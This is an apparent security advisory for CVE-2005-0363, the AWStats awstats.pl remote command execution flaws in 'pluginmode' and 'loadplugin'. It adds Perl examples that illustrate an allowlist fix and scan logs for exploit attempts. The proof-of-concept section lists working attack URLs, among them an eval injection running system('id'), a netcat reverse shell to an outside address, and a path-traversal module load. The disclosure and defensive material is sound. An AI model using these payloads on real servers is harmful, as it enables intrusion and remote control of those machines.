AWStats Plugin Multiple Remote Command Execution Vulnerabilities
BID:12543
Info
| Bugtraq ID: | 12543 |
| Class: | Design Error |
| CVE: | CVE-2005-0363 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | GHC <[email protected]> is credited with the disclosure of this issue. |
| Vulnerable: | AWStats 6.5.0 build 1.857, 6.3, 6.2, 6.1, 6.0, 5.9, 5.8, 5.7, 5.6, 5.5, 5.4, 5.3, 5.2, 5.1, 5.0, 4.0 |
| Not Vulnerable: | AWStats 6.5.0 build 1.857, 6.3, 5.6 |
Note: the original record lists 6.3, 5.6 and 6.5.0 build 1.857 in both the Vulnerable and the Not Vulnerable rows. The Discussion below reports 6.3 and later as not vulnerable, while the disclosure thread is titled "AWStats <= 6.4" and its proof-of-concept URLs target an 'awstats-6.4' install; verify the version actually deployed rather than relying on either list.
Discussion
Multiple remote command execution vulnerabilities reportedly affect AWStats. The 'awstats.pl' CGI script builds Perl code and file paths from request parameters without validating them, so a remote attacker can supply text that is executed in the context of the affected application.
The first problem is the 'pluginmode' parameter of 'awstats.pl' (the proofs of concept below spell it both 'PluginMode' and 'pluginmode'; both forms are accepted). Its value is interpolated into a string that awstats.pl hands to Perl's eval. A value that starts with a colon and continues with arbitrary Perl is therefore compiled and run: the colon turns the fixed function-name prefix that awstats.pl places in front of the value into a Perl label, and everything after it is a free-standing statement. The second issue is the handling of the 'loadplugin' parameter: the supplied plugin name is used to build the path of the Perl module to load without stripping directory components, so a name containing '../' sequences makes awstats.pl load an arbitrary '.pm' file from the server's filesystem (the proof of concept below loads the standard 'blib' module this way).
An attacker may leverage these issues to execute arbitrary commands with the privileges of the web server process running the vulnerable script. This may facilitate unauthorized access to the affected computer, as well as other attacks such as opening a reverse shell back to the attacker, as one of the proofs of concept below does.
Multiple sources have reported that AWStats 6.3 and subsequent versions are not vulnerable to these issues; the original disclosure claimed versions up to 6.4, and the "can't reproduce in 6.3?" thread in the References records the disagreement.
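The following is an added illustration, not AWStats' own code: a reduced model of the dispatch pattern the Discussion describes (a request parameter interpolated into a string that is passed to eval) next to an allowlisted table lookup that closes the hole. The 'BuildFullHTMLOutput_' prefix, the two stand-in output routines and the '%MODES' table are assumptions made for the example; the payload has the same shape as the advisory's 'PluginMode=:print+system('id')+;' but sets a flag instead of running a command.

```perl
#!/usr/bin/perl
# Added example, not code from awstats.pl. Models the PluginMode handling:
# untrusted text spliced into Perl source and compiled with a string eval,
# versus a fixed dispatch table that never compiles attacker input.
use strict;
use warnings;

# Stand-ins for plugin output routines (assumed names, not AWStats' real ones).
sub BuildFullHTMLOutput_hostinfo { return "hostinfo page" }
sub BuildFullHTMLOutput_geoip    { return "geoip page" }

our $INJECTED = 0;   # becomes 1 only if attacker-supplied text actually runs

# Vulnerable: the parameter value becomes part of the program text.
sub render_vulnerable {
    my ($plugin_mode) = @_;
    my $code = "BuildFullHTMLOutput_$plugin_mode()";   # e.g. BuildFullHTMLOutput_hostinfo()
    my $out  = eval $code;                             # string eval compiles whatever arrived
    return $@ ? "eval error: $@" : (defined $out ? $out : "(no output)");
}

# Hardened: check the shape, then look the name up in a fixed table.
my %MODES = (
    hostinfo => \&BuildFullHTMLOutput_hostinfo,
    geoip    => \&BuildFullHTMLOutput_geoip,
);
sub render_hardened {
    my ($plugin_mode) = @_;
    return "invalid plugin mode"
        unless defined $plugin_mode
            && $plugin_mode =~ /\A[a-z0-9_]{1,32}\z/
            && exists $MODES{$plugin_mode};
    return $MODES{$plugin_mode}->();
}

# Payload with the advisory's shape. After interpolation the eval'd source is
#   BuildFullHTMLOutput_:$main::INJECTED = 1 ;()
# The leading ":" makes "BuildFullHTMLOutput_" a Perl label, so the remainder
# is an ordinary statement that eval executes; the real PoC puts system() here.
my $payload = ':$main::INJECTED = 1 ;';

print "vulnerable / hostinfo : ", render_vulnerable('hostinfo'), "\n";
print "vulnerable / payload  : ", render_vulnerable($payload), "\n";
print "  INJECTED after eval   = $INJECTED\n";    # 1: the injected statement ran
$INJECTED = 0;
print "hardened   / hostinfo : ", render_hardened('hostinfo'), "\n";
print "hardened   / payload  : ", render_hardened($payload), "\n";
print "  INJECTED after lookup = $INJECTED\n";    # 0: the payload was never compiled
```

The same allowlist approach covers the 'loadplugin' issue: a plugin name that passes a bare-word check and a table lookup cannot carry '../' into a require path. Rejecting the request when the shape check fails, rather than trying to sanitize the string, is what keeps the fix simple to reason about.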
Exploit / POC
The following proof of concepts have been provided:
To execute arbitrary commands:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+;
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
To trigger a denial of service condition:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep
To load the 'blib' Perl module:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
The following proof of concept was provided by <[email protected]>:
http://www.example.com/awstats/awstats.pl?pluginmode=:system
http://xxx/awstats/awstats.pl?pluginmode=:system("/bin/ls");
The following proof of concept has been made available:
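The following is an added example, not part of the advisory or of AWStats: a small Perl sweep over web server access logs that flags requests carrying the two exploit shapes shown in the proofs of concept above, a 'pluginmode' value that is not a bare word and a 'loadplugin' value containing '..' or a path separator. The log lines are constructed for the example in Apache combined format; client addresses, timestamps and user agents are made up.

```perl
#!/usr/bin/perl
# Added example, not from the advisory: flag awstats.pl requests whose
# pluginmode/loadplugin parameters look like the published PoCs.
use strict;
use warnings;

# Constructed sample log lines (Apache combined format); nothing here is real traffic.
my @LOG = (
  '10.0.0.5 - - [14/Feb/2005:10:01:02 +0000] "GET /cgi-bin/awstats.pl?config=www HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
  '10.0.0.9 - - [14/Feb/2005:10:02:11 +0000] "GET /cgi-bin/awstats.pl?&PluginMode=:print+system(%27id%27)+; HTTP/1.0" 200 88 "-" "curl/7.10"',
  '10.0.0.9 - - [14/Feb/2005:10:02:40 +0000] "GET /cgi-bin/awstats.pl?&hack=$rp&pluginmode=%3Asleep HTTP/1.0" 500 0 "-" "curl/7.10"',
  '10.0.0.7 - - [14/Feb/2005:10:03:05 +0000] "GET /cgi-bin/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib HTTP/1.0" 500 0 "-" "-"',
  '10.0.0.3 - - [14/Feb/2005:10:04:00 +0000] "GET /cgi-bin/awstats.pl?config=www&pluginmode=hostinfo HTTP/1.0" 200 4096 "-" "Mozilla/4.0"',
);

# Undo %XX escapes and the "+" the PoCs use for spaces, so ":" hidden as %3A is seen.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Return [reason, decoded value] pairs for one log line; empty list if clean.
sub check_line {
    my ($line) = @_;
    return () unless $line =~ m{"(?:GET|POST|HEAD) \S*awstats\.pl\?(\S*)};
    my $query = $1;
    my @hits;
    for my $pair (split /&/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && defined $value;
        $value = url_decode($value);
        # Parameter names are matched case-insensitively, as the PoCs show both spellings.
        if (lc $name eq 'pluginmode') {
            # A legitimate mode is a bare word; anything else is Perl being smuggled in.
            push @hits, ['pluginmode not a bare word', $value]
                unless $value =~ /\A[A-Za-z0-9_]+\z/;
        } elsif (lc $name eq 'loadplugin') {
            push @hits, ['loadplugin path traversal', $value]
                if $value =~ m{\.\.|/|\\};
        }
    }
    return @hits;
}

for my $line (@LOG) {
    for my $hit (check_line($line)) {
        my ($client) = $line =~ /\A(\S+)/;
        printf "%-10s %-28s %s\n", $client, $hit->[0], $hit->[1];
    }
}
```

Run against real logs, feed the file through the same check_line loop instead of the constructed array. Only GET query strings appear in access logs, so a POSTed body with the same parameters would not be caught this way, and a 200 status on a flagged line (as on the 'system(id)' sample) is the one to investigate first.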
Solution / Fix
Solution:
Debian has released advisory DSA 682-1 to address these issues. Please see the referenced advisory for more information. Multiple sources report AWStats 6.3 and later as not vulnerable (see the Discussion and the version lists above), so on other platforms the fix is to upgrade to a release reported as not vulnerable.
AWStats AWStats 4.0
- Debian awstats_4.0-0.woody.2_all.deb (Debian GNU/Linux 3.0 alias woody)
  http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2_all.deb
References
References:
- AWStats Homepage (AWStats)
- AWStats Vulnerability Analysis ([email protected])
- AWStats <= 6.4 Multiple vulnerabilities (GHC)
- Re: AWStats <= 6.4 Multiple vulnerabilities (Ondra Holecek)
- Re: AWStats <= 6.4 Multiple vulnerabilities (Laurent Destailleur)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Thom Craver)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Matt Wilder)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Herman Sheremetyev)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Jamie Pratt)